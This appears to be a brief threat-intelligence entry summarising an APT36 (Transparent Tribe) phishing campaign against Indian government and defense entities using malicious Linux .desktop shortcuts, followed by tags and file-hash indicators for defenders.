Pakistan-linked APT36 (Transparent Tribe) launched a new cyber-espionage campaign targeting Indian government and defense entities. Active in August 2025, the group used phishing ZIP files containing malicious Linux “.desktop” shortcuts that downloaded payloads from Google Drive. Author: AlienVault
Related Tags:
stealth server
linux desktop
ctfuft
icon data
critical sectors
stealth
websocket
T1064
syscall
Associated Indicators:
7A946339439EB678316A124B8D700B21DE919C81EE5BEF33E8CB848B7183927B
34AD45374D5F5059CAD65E7057EC0F3E468F00234BE7C34DE033093EFC4DD83D
DF4DB969A69EFC1DB59F4D3C596ED590EE059777
3E3169C513C02126028480421FB341A167CB9FCD
1982F09BFAB3A6688BB80249A079DB1A759214B7
508A3568C56ED4F613CFAFEF23FF12C81BA627EB
6AC0FE0FA5D9AF8193610D710A7DA63C
566DDD4EB4CA8D4DD67B72EE7F944055
A484F85D132609A4A6B5ED65ECE7D331